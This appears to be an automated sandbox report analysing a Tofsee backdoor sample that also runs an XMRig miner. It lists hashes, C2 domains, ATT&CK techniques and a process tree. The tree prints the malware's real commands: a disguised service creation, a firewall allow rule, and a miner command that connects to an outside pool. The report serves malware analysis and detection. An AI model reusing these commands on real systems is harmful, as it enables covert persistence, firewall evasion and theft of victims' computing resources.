Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    05-06-2022 13:09

General

  • Target

    bae588fa5d58a7907571344a1253897e3c90748e669ec4d83ff03c2fa60e11e7.exe

  • Size

    266KB

  • MD5

    bffacbdec5ffc73ebf7b34cb9845da57

  • SHA1

    d97ccdd9084f8aa6d713043293a866389a23f4f9

  • SHA256

    bae588fa5d58a7907571344a1253897e3c90748e669ec4d83ff03c2fa60e11e7

  • SHA512

    fa6aee45e9b77a2db69751bec5d3e2fa473ace9eccd9a0857a55020fad9758f8ac5b1810cfc011956b18c8ba903bb0ee3ad6727d171010ad0db1a30f93fb5bbf

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bae588fa5d58a7907571344a1253897e3c90748e669ec4d83ff03c2fa60e11e7.exe
    "C:\Users\Admin\AppData\Local\Temp\bae588fa5d58a7907571344a1253897e3c90748e669ec4d83ff03c2fa60e11e7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\widyxxus\
      2⤵
        PID:1408
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qyerwzsn.exe" C:\Windows\SysWOW64\widyxxus\
        2⤵
          PID:3696
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create widyxxus binPath= "C:\Windows\SysWOW64\widyxxus\qyerwzsn.exe /d\"C:\Users\Admin\AppData\Local\Temp\bae588fa5d58a7907571344a1253897e3c90748e669ec4d83ff03c2fa60e11e7.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1852
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description widyxxus "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:5092
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start widyxxus
          2⤵
          • Launches sc.exe
          PID:3540
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4392
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1380
          2⤵
          • Program crash
          PID:4264
      • C:\Windows\SysWOW64\widyxxus\qyerwzsn.exe
        C:\Windows\SysWOW64\widyxxus\qyerwzsn.exe /d"C:\Users\Admin\AppData\Local\Temp\bae588fa5d58a7907571344a1253897e3c90748e669ec4d83ff03c2fa60e11e7.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3616
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1164
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3724
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 512
          2⤵
          • Program crash
          PID:4688
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4836 -ip 4836
        1⤵
          PID:2344
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3616 -ip 3616
          1⤵
            PID:980

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\qyerwzsn.exe
            Filesize

            12.3MB

            MD5

            26e0a834002214e10fede2e87a721bf1

            SHA1

            7895fbe62b4686dced2d0743f9c0dfb1c787130e

            SHA256

            a3df95711331bcf18a8b098f8d7d7fb4bbac4ee46fe8e6dd463f8f5b678842f7

            SHA512

            f9ac932161bb49d59d67a991e4f14d97aeba581c38fbe314a73bda433212f74323095509da7732d5a1ea64494d0a4e5edf5aeae1b4dadb990888b1dba3674c81

          • C:\Windows\SysWOW64\widyxxus\qyerwzsn.exe
            Filesize

            12.3MB

            MD5

            26e0a834002214e10fede2e87a721bf1

            SHA1

            7895fbe62b4686dced2d0743f9c0dfb1c787130e

            SHA256

            a3df95711331bcf18a8b098f8d7d7fb4bbac4ee46fe8e6dd463f8f5b678842f7

            SHA512

            f9ac932161bb49d59d67a991e4f14d97aeba581c38fbe314a73bda433212f74323095509da7732d5a1ea64494d0a4e5edf5aeae1b4dadb990888b1dba3674c81

          • memory/1164-155-0x0000000001FF0000-0x0000000001FF6000-memory.dmp
            Filesize

            24KB

          • memory/1164-164-0x0000000007A00000-0x0000000007E0B000-memory.dmp
            Filesize

            4.0MB

          • memory/1164-145-0x0000000000980000-0x0000000000995000-memory.dmp
            Filesize

            84KB

          • memory/1164-144-0x0000000000000000-mapping.dmp
          • memory/1164-149-0x0000000000980000-0x0000000000995000-memory.dmp
            Filesize

            84KB

          • memory/1164-161-0x00000000023D0000-0x00000000023D5000-memory.dmp
            Filesize

            20KB

          • memory/1164-151-0x0000000000980000-0x0000000000995000-memory.dmp
            Filesize

            84KB

          • memory/1164-152-0x0000000002A00000-0x0000000002C0F000-memory.dmp
            Filesize

            2.1MB

          • memory/1164-158-0x0000000002380000-0x0000000002390000-memory.dmp
            Filesize

            64KB

          • memory/1164-167-0x00000000023E0000-0x00000000023E7000-memory.dmp
            Filesize

            28KB

          • memory/1408-132-0x0000000000000000-mapping.dmp
          • memory/1852-136-0x0000000000000000-mapping.dmp
          • memory/3540-138-0x0000000000000000-mapping.dmp
          • memory/3616-148-0x00000000030BE000-0x00000000030CE000-memory.dmp
            Filesize

            64KB

          • memory/3616-150-0x0000000000400000-0x0000000002DBA000-memory.dmp
            Filesize

            41.7MB

          • memory/3696-133-0x0000000000000000-mapping.dmp
          • memory/3724-170-0x0000000000000000-mapping.dmp
          • memory/3724-176-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/3724-171-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4392-140-0x0000000000000000-mapping.dmp
          • memory/4836-131-0x0000000002FF0000-0x0000000003003000-memory.dmp
            Filesize

            76KB

          • memory/4836-130-0x0000000003032000-0x0000000003042000-memory.dmp
            Filesize

            64KB

          • memory/4836-143-0x0000000000400000-0x0000000002DBA000-memory.dmp
            Filesize

            41.7MB

          • memory/4836-142-0x0000000002FF0000-0x0000000003003000-memory.dmp
            Filesize

            76KB

          • memory/4836-141-0x0000000003032000-0x0000000003042000-memory.dmp
            Filesize

            64KB

          • memory/4836-135-0x0000000000400000-0x0000000002DBA000-memory.dmp
            Filesize

            41.7MB

          • memory/5092-137-0x0000000000000000-mapping.dmp